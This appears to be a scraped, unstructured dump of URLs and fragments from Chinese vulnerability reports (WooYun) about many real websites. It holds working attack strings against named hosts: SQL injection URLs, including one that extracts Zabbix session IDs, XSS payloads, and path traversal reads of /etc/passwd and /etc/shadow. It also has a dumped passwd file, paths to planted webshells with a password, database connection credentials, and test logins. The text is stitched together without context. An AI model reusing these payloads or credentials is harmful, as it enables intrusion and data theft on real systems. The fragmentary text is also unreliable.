http://xin.52xinyou.cn/ http://xin.52xinyou.cn/pay-order.html?gid=62485%27 http://c.ctsho.com/ http://c.ctsho.com/is/index.jsp http://mtest.ayibang.com/appointment/?keyword=project_depth_cleaning&city=%E5%8C%97%E4%BA%AC http://360.m.ayibang.com/appointment/?keyword=project_clean_glass&city=%E5%8C%97%E4%BA%AC http://**.**.**.**/modify/login.asp http://www.baojia.com/account/ http://oss.baojia.com/cs/toUpdate/1 http://oss.baojia.com/wechat/toUpdate/3 http://oss.baojia.com/wechat/toUpdateReplies/1 http://123.57.36.48 http://**.**.**.**/bigclass.asp?bigclassid=31 http://**.**.**.**/bigclass.asp?bigclassid=31 http://www.agrite.com.cn/ http://www.agrite.com.cn/plus/mytag_js.php?aid=9090 http://**.**.**.**/modules/info/league/index.php?mid=1 https://www.anpingdai.com/index.php?s=/Admin/User/Login.html username:it-test password:123456 https://www.anpingdai.com/upload/1447822200/1.php http://beijing.zznissan.com.cn/admin/console/?c=login&a=log http://**.**.**.**:9876/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:9876/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1%20union%20select%201,2,3,@@version,5,6,7 http://**.**.**.**:9876/weaver/weaver.email.FileDownloadLocation?fileid=*&download=1 http://**.**.**.**:9876/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 http://api.mkf.com/api.php?mkfstr=YjVhYjE3ODhhYzA4ODY0ODJlMjdhY2Q2ODZhYjg4Y2NleUp1YjNkd1lXZGxJam9pTVNJc0ltRWlP%0D%0AaUp2Y21SbGNreHBjM1FpTENKdElqb2lUM0prWlhJaWZRPT0NCg==%0D%0A&g=Api2_1_1&os=android&user_id=1**1929 http://www.lib.uestc.edu.cn http://fj.tf56.com/fjSite/hostwebsitecs/invoke?address=1&callback=jQuery17206091691900510341_1447705981678&cmd=selectCarLocationList&emptyload=&faith=&keyword=&nlengthmax=&nlengthmin=&ntonmax=&ntonmin=&pageSize=10&partyid=null&site=&skipCount=0&sort=inputDate&toaddress=&_=1447706033792 http://www.helloan.cn/web/instation/instationInfo.cuc?id=12497111 http://**.**.**.**/Login.aspx http://xmys.zznissan.com.cn/ajax_default_models.php?models= http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976\?redirect:/xxoo http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 redirect:/xxoo=1 http://**.**.**.**/integral/web/productDetail/detailProduct.action\?iProduct\=17976 redirect:/xxoo=1 http://www.eweidai.com/safe/resetPassword.jsp http://**.**.**.**/visa/detail.jsp?visa_basic_info_id=17 http://**.**.**.**/visa/article.jsp?jspmaker_act_id=101 http://**.**.**.**/visa/article.jsp?jspmaker_act_id=83 http://**.**.**.**/visa/tour_show.jsp?jspmaker_act_id=1027303 http://**.**.**.** http://un.huanqiu.com http://jiyou.11185.cn/ http://jiyou.11185.cn/u/buyertdetail.html?tradeId=9436310&type=tlist http://ilife.homelink.com.cn/aigou eg:10099988 http://**.**.**.**/xwzx/xwxx.asp?id=1770 http://**.**.**.**/ http://111.207.170.84:82/ http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2 https://www.wooyun.org/bugs/wooyun-2015-0153270 http://im.chuchujie.com/mo/signin http://**.**.**.**/aboutus/aboutus.html http://**.**.**.**/product/?cid= http://**.**.**.**/product/?cid=9 http://**.**.**.** http://**.**.**.**/s/index.asp?id=26 http://www.vmovier.com www.vmovier.com http://202.120.197.22/ http://zone.wooyun.org/content/23905 http://www.ebogame.com/user_findpwd.php?t=doquestion http://www.jubaowu.com.cn/jubaowu/public/auth/login http://issue.wanglibank.com/ http://www.ydma.cn/ http://119.188.72.165/admin/gotologin.box https://github.com/machao23/workHour/blob/e630a027fab0bbb0b7105e192c32d49105653ec2/config.ini http://vp.csii.com.cn/project/ http://mel.xmu.edu.cn:80/comet/absence_inform_file.asp?id=1 http://mel.xmu.edu.cn/meeting/10th_iebs/infosys/admin_login.asp http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**/weblogin.aspx http://**.**.**.**:1500/weblogin.aspx http://**.**.**.**:1600/weblogin.aspx https://www.wooyun.org/bugs/wooyun-2015-0147241,咦,不能开传送门了,那截图好了 511422.wsglw.net/do/Person/Person.do http://www.yafco.com/tools/tools.zip http://infosec.sjtu.edu.cn/UndergraduateDetail.asp?id=270 http://infosec.sjtu.edu.cn/bg/ http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1 http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1 http://cp.super8.com.cn/Order/Details?orderNo=31031887 http://cp.super8.com.cn/Order/Details?orderNo=31031864 http://cp.super8.com.cn/Order/Details?orderNo=31032063 http://**.**.**.**/search_index.php http://**.**.**.**/search_index.php http://**.**.**.**/LoginAction.do?method=qrySystemPostByID&news_id=99378ABCF7841BC6E04013AC3C0027DE http://**.**.**.**/LoginAction.do?method=qrySystemPostByID&news_id=99378ABCF7841BC6E04013AC3C0027DE http://woodscience.csuft.edu.cn/hudong/Vote.aspx?id=111 http://10.10.102.102/a/login.asp http://10.10.102.102/a/eWebEditor/admin_login.asp https://www.wooyun.org/bugs/wooyun-2010-0143063 http://115.29.202.192:7001/prlife-jfmall/index.shtml地址打不开了,应该已经修复了 http://115.29.202.192:7002/console/login/LoginForm.jsp http://115.29.202.192:7002/ca/index.jsp http://115.29.202.192:7002/ca/a.jsp http://115.29.202.192:7002/ca/ma3.jsp?o=vLogin http://115.29.202.192:8081/console/login/LoginForm.jsp http://**.**.**.**/news_detail.asp?NewsId=6251 http://**.**.**.**/news_detail.asp?NewsId=6251 http://itoms.open.com.cn/Admin/index.aspx http://oa.gaosiedu.com http://oa.gaosiedu.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER https://www.wooyun.org/bugs/wooyun-2010-0141651 ftp://58.53.212.29/ https://www.wooyun.org/bugs/wooyun-2010-0143202 https://www.wooyun.org/bugs/wooyun-2010-0142472 https://www.wooyun.org/bugs/wooyun-2010-0142255 http://**.**.**.**/login.aspx,万能密码即可登录,上传文件没有过滤,可直接上传asp大马,进入系统可获取管理员权限。 http://www.9666.cn/passRestore/showPassRestore.action http://sswz.chinapost.gov.cn/login.do http://rxms.ebogame.com/news.php?contentid=2654 B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1 www.91zjd.com http://**.**.**.**/,如图所示: http://**.**.**.**:8012/Login/Login,如图所示: http://**.**.**.**:8012 http://**.**.**.**/submodule/SituationsInfo.aspx?User_Name=gxnngjkj http://**.**.**.**/submodule/SituationsInfo.aspx?User_Name=gxnngjkj http://**.**.**.**/login http://**.**.**.** http://**.**.**.**/login http://**.**.**.**/register http://mail.yisence.com http://www.yingcankeji.com www.yingcankeji.com https://wooyun.org/bugs/wooyun-2015-0153878 http://172.16.4.95/cmsmanage/monitor.php?act=list http://172.16.4.95/cmsmanage/monitor.php?act=list http://**.**.**.**/web/page.php?fp=newsdetail&id=2311 http://**.**.**.**/web/page.php?fp=newsdetail&id=2311 http://www.uqee.com/Jobs/staff/index/info_id/1* http://**.**.**.**/readnews.asp?id=2233 http://**.**.**.**/readnews.asp?id=2233 http://**.**.**.**/more_pic.action?classId=020204&page=2&t= http://wap.hihoku.com/3g/baike.php?id=17244 http://**.**.**.**/tc/product-detail.php?cid=1&id=357 http://**.**.**.**/tc/product-detail.php?cid=1&id=357 http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2 http://**.**.**.**/nol/coursesearch/print_table.php?course_id=104%2014800&class=&dpt_code=0000&ser_no=10105&semester=97-2 http://bbs.oneapm.com/utility/convert/index.php https://wooyun.org/searchbug.php http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407 http://**.**.**.**/admin/Epaper/ugA_CEpaperView.asp?hidEpaperID=1407 http://haoweshop.com:9000/script http://haoweshop.com/woooyun.aspx http://app.pcjoy.cn/,我测试的是安卓版 http://**.**.**.**/index_82.aspx?itemid=160 http://**.**.**.**/qhpz/list_41.aspx?lcid=6 http://**.**.**.**/index_80.aspx?itemid=%3CSVG/onload=alert%28%29;%3E http://**.**.**.**/qhpz/list_41.aspx?lcid=%3Csvg/onload=alert%28%29;%3E http://**.**.**.**/editor/ http://**.**.**.**/xxhs.asp?classid=92 http://**.**.**.**/xxhs.asp?classid=92 http://**.**.**.**:8090/db.sql https://www.wooyun.org/bugs/wooyun-2015-0141818 http://www.91zjd.com:80/ www.91zjd.com http://fws.rrs.com/index www.zrcbank.top www.zrcbank.top http://wx.300.cn http://wx.300.cn/help/?act=search&q=1%27%22&serhidde=0 http://wx.300.cn/.svn/entries http://info.passport.cntv.cn/wyznt/wyznt.jsp http://info.passport.cntv.cn/wyznt/wyznt.jsp http://**.**.**.**/cms/upload.jsp http://www.aniworld.tv http://zx.game.xiaomi.com/ http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://**.**.**.**:8099//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/passwd http://**.**.**.**:8099//live/down.jsp?file=../../../../../../../../../../../../../../../../etc/hosts https://wooyun.org/bugs/wooyun-2010-0151050 http://rsc.scu.edu.cn/Account/UserLogin.aspx http://www.dingniugu.com/ddeLine.php?stockcode=601111 http://www.dingniugu.com/ddeLine.php?stockcode=601111 https://**.**.**.**/citiccard/cardishop/jsp/index.jsp?sid=ECCHZF1&pid=CS0119&uid=hahahehe http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202034 http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202033 http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202032 http://**.**.**.**:8081/bin/productList.do?ac=proOrder&type=edit&curPage=2 http://**.**.**.**:8081/bin/allottellog.do?method=orderlog&eventId=202031 http://lidroid.com/article?id=127&root=125 http://home.ttce.cn/userhome/OrderDetail.aspx?orderid=34996 http://www.letoudai.com/users/self/reset_password http://**.**.**.**:8081/Tra/pub/common/getImgPath.do?path=L2pqdHAvVklPUElDL1AyMDE1L0RfNDg0L0RfMzgyLzlFMzA0Qjg3QzZCOUVDQUZFRDJCNEI5OUFFMThCNTQw http://**.**.**.**:8081/Tra/pub/common/getImgPath.do?path= http://125.88.6.164/jenkins/ https://wxtest.csair.com/csair-appstore-client/ url:http://**.**.**.**/wymc-n.php?id=134 http://59.151.27.181/phpspy.php http://59.151.27.163/phpspy.php http://shop.cdev.emaotai.cn/admin/login.aspx?returnUrl=/admin http://oa.daynitom.com/index.asp http://www.enkj.com/jz/casedetails.asp?id=1 http://www.enkj.com/autosite/ajax/CreatePrice.ashx?type=gp&tp= http://www.enkj.com/idcnews/controls/CreateCode.ashx?random= http://www.enkj.com/user/forget-sub.asp http://univ.zte.com.cn/ContentManage/ http://oms.znv.com:80/ http://59.151.27.147:8080/TransData.asmx?WSDL http://www.feiren.com/ http://wiki.wooyun.org/pentest:filepath http://news.qq.com/etc/hosts http://news.qq.com/etc/host.conf http://news.qq.com/etc/sysconfig/network-scripts/ifcfg-eth0 http://**.**.**.** http://**.**.**.**/admin/file.asp http://**.**.**.**/onews.asp?id=2453 http://**.**.**.**/ http://**.**.**.**/bbs/toplist.jsp?Page=1&orders=7 filetype:doc http://**.**.**.**/jsp/portal/ http://**.**.**.**/resource/news/images/CMS14801/77411.jsp http://**.**.**.**/NewsInfo.asp?ID=156 http://219.145.113.158:8000 http://**.**.**.**/zsxx/webedit/admin_login.asp http://hg.airchinacargo.com/ http://www.lvmama.com/lvyou/ www.lvmama.com http://www.daidekuai.com/aboutus.php?id=173 http://**.**.**.**/login http://**.**.**.**/admin/login.aspx www.gssok.com http://**.**.**.**/news_show.php?id=397 http://**.**.**.**/admin/member_list.php?page=13 http://**.**.**.**/admin/index.php http://**.**.**.**/index.jsp http://zt.iciba.com/guess/index.php?module=caici&f=dt&act=exam data:q_id=87&from=q_outer&q_answer=0&q_answer=1&q_answer=2 mapi.damai.cn/user/Login.aspx?account=§15510785831§&pwd=123456&source=10099&version=50300 http://e.zznissan.com.cn/这个页面http://e.zznissan.com.cn/dealer-search_3.html http://www.bs.ecnu.edu.cn www.bs.ecnu.edu.cn http://www.emaotai.cn/vshop/productlist.aspx?categoryid=1&keyword=1 http://show.test.yoho.cn/admin/system/adminuser/page/4 http://119.254.81.209/login http://analytics.open.yohobuy.com/.svn/entries http://static.yohobuy.com/.svn/entries http://m1.yohobuy.com/.svn/entries http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://123.59.1.112/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin resin:x:501:501::/home/resin:/bin/bash warren:x:502:502::/home/warren:/bin/bash qinhua:x:503:503::/home/qinhua:/bin/bash kavin:x:509:509::/home/kavin:/bin/bash steven:x:510:510::/home/steven:/bin/bash bink:x:511:511::/home/bink:/bin/bash sailing:x:512:512::/home/sailing:/bin/bash cntv:x:0:0::/home/cntv:/bin/bash http://sso.easou.com/ http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://120.197.95.198/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://120.197.95.198/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://120.197.95.241/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://sso.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://sso.easou.com//db/2.6.0.sql http://223.99.226.150/zabbix/ http://cv.eol.cn http://phpadmin.daojia.com:8081 ConnetionURL:jdbc\:mysql\://192.168.120.224\:58885/dbwww58com_comment?connectTimeout=1000&useUnicode=true&characterEncoding=UTF-8&autoReconnect=true DriversClass:com.mysql.jdbc.Driver UserName:comment58user PassWord:plmko8u76yhwsx ConnetionURL:jdbc\:mysql\://10.58.29.2\:3306/58.test.scf?connectTimeout=1000&useUnicode=true&characterEncoding=UTF-8&autoReconnect=true DriversClass:com.mysql.jdbc.Driver UserName:root PassWord:zhangquan http://yunpan.cn/cJ9F9xPKAcr6Z http://teacher.sicnu.edu.cn http://www.qdmixc.com/admini/login.php http://a.app.qq.com/o/simple.jsp?pkgname=com.able.wisdomtreeforteacher http://www.jzjt.com/application/configs/application.ini http://lib.henannu.edu.cn/ArticleList.aspx/action=Add&AllCount=1¤tpage=0&guid=d&pagesize= http://lib.henannu.edu.cn/ArticleList.aspx?SectionId=* http://lib.henannu.edu.cn http://lib.henannu.edu.cn http://**.**.**.**/ http://**.**.**.**/etan2010/works_data_detail.php?id=200 http://**.**.**.**/site_item_content_4.php?site_map_item_id=43 http://**.**.**.**/site_item_content_2.php?site_map_item_id=590 http://**.**.**.**/news.php?id=81 http://**.**.**.**/news_detail.php?id=38 http://hanyu.iciba.com/wiki/index.php?edition-compare-1 http://**.**.**.** http://**.**.**.**/search.php http://**.**.**.**/products.php?ms=1 http://**.**.**.**/products_show.php?ms=16&ss=17&ps=14 http://221.8.57.106:7020/console/login/LoginForm.jsp http://ok.sdo.com/admin.zip http://member.360hitao.com/ http://**.**.**.**/bugs/wooyun-2010-0106283 ext:uc_dw就行了。 http://218.1.66.148/seeyon//logs/ctp.log http://218.1.66.148/seeyon/ http://**.**.**.**/admin/Main.aspx http://hos.nenu.edu.cn http://**.**.**.**/news_con.php?pk=9&page=&l http://**.**.**.** www.zowoyoo.com http://www.zowoyoo.cn/about.html http://report.hoolai.com http://www.hisense.com/ids/account/trsadmin11.jsp?cmd=id这就是马儿地址 http://218.17.200.230:8051/console/login/LoginForm.jsp http://fenghuang.damai.cn http://**.**.**.**:8081/ http://jyyy.jx.sgcc.com.cn http://**.**.**.**//login/login.init.do?otherPageName=../../ http://**.**.**.**//login/login.init.do?otherPageName=../../env.properties http://**.**.**.**/webos/images/coursecenter/back/.svn/entries http://**.**.**.**/webos/js/uploadify/.svn/entries http://**.**.**.**/webos/js/uploadify/php/.svn/entries http://**.**.**.**/ http://**.**.**.**/fccms/site/num/ssqkjgg-zt.jsp http://**.**.**.**/fccms/site/num/3dkjgg.jsp http://**.**.**.**/fccms/site/num/3dkjgg.jsp http://**.**.**.** http://easy-u.dongfeng-nissan.com.cn/spadmin/gift_excel.php?EndTime=*&GifeType=1&ok=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/index.php?mod=appraisal&page=%5c http://easy-u.dongfeng-nissan.com.cn/spadmin/index.php?CarState=*&EndTime=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/spadmin/newcar.php?EndTime=*&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/spadmin/newcar_excel.php?EndTime=*&ok=1&SatTime=1 http://easy-u.dongfeng-nissan.com.cn/usedcaradmin/login_action.php http://wooyun.org/bugs/wooyun-2015-0152905 http://wooyun.org/bugs/wooyun-2015-0154242),安全系数已经高了不少,然而,并没有什么卵用,多次尝试后还是进来了。 URL:http://202.96.17.231发现2个弱口令: http://**.**.**.**/ http://**.**.**.**:9005 https://www.sebug.net/vuldb/ssvid-89715 http://219.143.69.53:9090/index.jsp http://**.**.**.**/photosview/lover_map.asp?id=1 http://www.sooker.com/wangxiaos/1-0-0-0-0-0-0-0-0-0-0.html?course_name=e http://**.**.**.**/lq_teach.aspx DBName:NetCMS、QLFDB http://e.huanqiu.com/login.action https://**.**.**.**/hkulprimo/login.action http://k3srm.dahuatech.com:8015/custom/default.aspx http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578 http://**.**.**.**/index.php?m=Goods&a=show&suppliers_id=7&id=578 http://**.**.**.**/bugs/wooyun-2010-0135332 http://**.**.**.**:8080/manage/admin/admin.jsp,可对超管直接进行新增,编辑等操作 http://**.**.**.**/bugs/wooyun-2010-0135332,但此时可以获取管理帐号密码直接登录系统内再getshell http://**.**.**.**:8080/manage/expert/expertinfo.htm http://**.**.**.**:8080/manage/zsk/commontype.html http://**.**.**.**:8080/manage/ywtj/expertactive.html http://**.**.**.**:8080/manage/ywtj/customeractive.jsp http://**.**.**.**:8080/manage/right/expertright.html http://**.**.**.**:8080/manage/right/expertrelation.html http://**.**.**.**:8080/manage/zsk/commoninfo.html http://**.**.**.**:8080/manage/msg/msg.jsp http://*/manage/admin/getAdmin.jsp http://**.**.**.**/ins!searchins.action http://www.ftimes.info/qiche_folder/qiche.php?bigtype=40 http://www.ftimes.info/ftimes/bbs/viewthread.php?tid=165832 http://www.ftimes.info/xinwen_erji.php?bigtype=1 http://www.ftimes.info/shishang_folder/shishang.php?bigtype=43 http://www.ftimes.info/m/shownews.php?id=69115 http://www.ftimes.info/jingdianlvyou_folder/jingdianlvyou.php?bigtype=23 http://www.ftimes.info/wochi_zhangtu/tiao1.php?id=601 http://hljjmsyt.zznissan.com.cn/map.php?jxs= http://office.mingyi.com.cn/txl/manage/login.aspx cyz.colourlife.com/notify/view?id=11950 http://cyz.colourlife.com/gift?start_time=2015-11-03&end_time=2015-11-13 cyz.colourlife.com/refundOrder?start_time=2015-11-05&end_time=2015-11-03&status= cyz.colourlife.com/record?start_time=2015-11-03&end_time=2015-11-03&type= cyz.colourlife.com/refundOrder?start_time=2015-11-04&end_time=2015-11-04&status= http://cyz.colourlife.com/returnOrder?start_time=2015-11-04&end_time=2015-11-05&status= http://cyz.colourlife.com/electricOrder?start_time=2015-11-04&end_time=2015-11-04&status= cyz.colourlife.com/reserve?start_time=2015-11-04&end_time=2015-11-04 cyz.colourlife.com/payment?start_time=2015-11-03&end_time=2015-11-04&status= http://cyz.colourlife.com/notify/index?start_time=2015-11-04&end_time=2015-11-0&category_id=0 http://**.**.**.**:9096/zsw/ http://club.zznissan.com.cn/shangxi/shipin.php http://**.**.**/search.aspkeyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM http://**.**.**.**/search.asp?keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM http://dongfang.cheyipai.com/PContrller/Login/Index http://dongfang.cheyipai.com http://kia.cheyipai.com http://gwc.cheyipai.com/ http://e.cheyipai.com/ http://www.suxinwen.cn/aj_list.php?cid=1&page=1 http://www.suxinwen.cn/list.php?cid=18 http://**.**.**.**来演示 http://**.**.**.**/wapshop/productlist.aspx?sort=1 http://jjlyj.csuft.edu.cn http://www.paybyfinger.com.cn http://www.paybyfinger.com.cn http://**.**.**.**/searchproducts.php?cat=euAn&searchkey= http://**.**.**.**/searchproducts.php?cat=euAn&searchkey= http://**.**.**.**/CHN/view/digest_list_type.asp?dTypeId=51%20AND%203*2*1%3d6%20AND%20236%3d236&page=4&TypeName=%C6%F3%D2%B5%C4%EA%BD%F0%D7%A8%CC%E2 http://**.**.**.**/getpwd.asp?DepartNo=001000000000&UserName= http://**.**.**.**/about_policy_d.php?policy_id=542 http://**.**.**.**/cert_details.php?id=46 http://**.**.**.**/cert_details.php?id=46 ttp://**.**.**.**/content/index.php?lang=2&lv1=5 http://**.**.**.**/content/index.php?lang=2&lv1=5 http://**.**.**.**/admin/login http://**.**.**.**/admin/login http://**.**.**.**/data/admin/ver.txt http://**.**.**.**:7001 http://**.**.**.**:7001/UserIDVerifyServlet http://**.**.**.**:7001/UserIDVerifyServlet wxshop.yili.com/wxshop.zip http://uuask.com/index.html http://nbnssb.aisino.com/online/new/show.asp http://**.**.**.**:80/ http://121.14.6.93:8001/login.asp http://www.cetools.cn http://www.cetools.cn/index.php/cetools_admin/index http://dcc.whut.edu.cn/newAction_index.action http://dcc.whut.edu.cn/newAction_index.action http://dcc.whut.edu.cn/webfuck_shell.jsp,Webfuck_2015 http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/web.xml http://**.**.**.**/s_second.php?id=28 http://**.**.**.** url:http://2014.minmindai.com/Test?content=sqlinject&a=index&button=%E6%9F%A5%E8%AF%A2%E9%97%AE%E9%A2%98&m=Test http://**.**.**.**/ http://**.**.**.**/iwork/publish/showMore?siteId=37 http://**.**.**.**/iwork/publish/list?siteId=37&researchId=178 http://**.**.**.**/nchd/servlet/topicServlet?method=initTopic&status=2 http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?__rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?__rpc=true http://218.94.40.6:8080/hrss/dorado/smartweb2.RPC.d?__rpc=true http://career.sdebank.com/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.yxgroup.cc/hrss/dorado/smartweb2.RPC.d?__rpc=true http://hrzp.gzs.com.cn:9080/hrss/dorado/smartweb2.RPC.d?__rpc=true http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true http://zhaopin.cnooc.com.cn/hrss/dorado/smartweb2.RPC.d?__rpc=true http://nc.hbny.com.cn:9090/login.jsp http://nc.hbny.com.cn:9090/hrss/dorado/smartweb2.RPC.d?__rpc=true http://59.173.0.46:8070/hrss/dorado/smartweb2.RPC.d?__rpc=true http://218.94.40.6:8080/hrss/rm/RmMain.jsp?dsName=ncdl http://career.sdebank.com/hrss/rm/RmMain.jsp?dsName=sdns http://nc.yxgroup.cc http://hrzp.gzs.com.cn:9080 http://exmail.qq.com/ https://mail.hundsun.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.hundsun.com%2fowa%2f http://blog.lrts.me/wp-login.php http://36.250.78.77:3000/.svn/entries http://assets.lrts.me/.svn/entries http://d.lrts.me/.svn/entries http://m.lrts.me/.svn/entries http://soft.lrts.me/ http://103.249.52.2/qmhd/manage/index.php http://oa.colourlife.com https://github.com/ofmyice/Asmypro/blob/2990ba063f7262b5c653e0a552bdbf08fb321cbd/cyp/MobileWebApi/MobileWebApi/NLog.config http://hainan.zznissan.com.cn/deal_askprice.php?height=350;width=560&jxs=391&models=250 http://sso.hc360.com/ssologin?ReturnURL=http%3A%2F%2Fhr.hc360.com%2Fhr%2Fturbine%2Ftemplate%2Fresume%2Cmanage_center.html&renew=true这个接口本来有个https的,但是此处的https就没了,抓包发现用户名密码明文传输的: www.452561400@qq.com www.452561400@qq.com http://www.zznissan.com.cn/nissan/buy/Mp4Down.php?id=6 http://www.zznissan.com.cn/nissan/buy/Mp4Down.php?id=6 http://e.zznissan.com.cn/event/20130909/news/artical.php?sortid=2&arcid=19 http://e.zznissan.com.cn/down.php?cid=1 http://e.zznissan.com.cn/down.php?cid=1 http://www.zznissan.com.cn/english/nissan/car.php?series=9 http://**.**.**.**/seeyon/index.jsp http://taotao.pptv.com/撞库 http://e.easou.com/ http://**.**.**.**:8089/ http://**.**.**.**:8089/about/news_articles.asp?id=46 http://58.215.186.226/dashboard.php?sid=6ccc4e115ddb7e58 http://58.215.186.226/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://**.**.**.**/bugs/wooyun-2010-0154403这个洞的时候,发现了UC浏览器一个和帐号登陆有关的协议UCCloud UCCloud://ext:cs:userlogin:后面的内容先base64 http://**.**.**.**/cgi-bin/xlogin?appid=716027609&pt_3rd_aid=100468196&style=35&s_url=http%3A%2F%2F**.**.**.**&refer_cgi=authorize&which=&response_type=code&client_id=100468196&redirect_uri=http%3A%2F%2F**.**.**.**%2Fcas%2Fthirdparty%2Fauthorize&display=mobile&state=client_id%3D72%26third_party_name%3Dqq%26isbrowser%3D1 ext:close_window在登陆成功后关闭窗口,POC如下: UCCloud://ext:cs:userlogin:bTkwAKNolSRgB8i+UyjkCbWhycXmdENgS3a6BfKJLtuxhmeim7Pcveq2e45P3D70pBfRIk9l/6VnTCYTjZqk48waDfWHGDb1wjBtaYJ2lQfUzGSzRi6pJLUtpIR4GRgP+dulerAm5WzhtlCW/8pbV5weF8+p0ErP3pG+ZF6M89DENfWWEIkX/ssiutyB6YWJa9snIcW6uYplOX3LgkZN7DuWiyx2f68WbrmfEj8IREwcDEedCE9uYlf3NWffJ6FBWA1oLc7BVxBzK+WEIeo3PnKP+Wgk9pPMYG1QVhGQfr47zRmOnfaP8VH6zyC5G7mdBU/YUj5MH6tI2onwJRLa37PyBUAABCYo8lRCPtpsIyHqt8iNpDSAH/Q0yVF+hwwZz2YcMhbpjFCf7UyuBoH5coQkKHC2+U+PqKPiO7bGkbuhw+iNLjnFlbUFG29ebHCa6Kh/GxMZl6iyog== http://wms.gionee.com/invoker/JMXInvokerServlet http://**.**.**.**/newmh/customersc.do?action=searchAgent&abb_id=6&town_id=0&school_name=a&que_type=1&yewu_id=888&_temp=0.7060562921687961 http://**.**.**.**/newmh/customersc.do?action=searchAgent&abb_id=6&town_id=0&school_name=a&que_type=1&yewu_id=888&_temp=0.7060562921687961 http://**.**.**.**/bugs/wooyun-2015-0135621。后台目测也没做处理。 http://www.mydrivers.com主站登录位置,有验证码限制 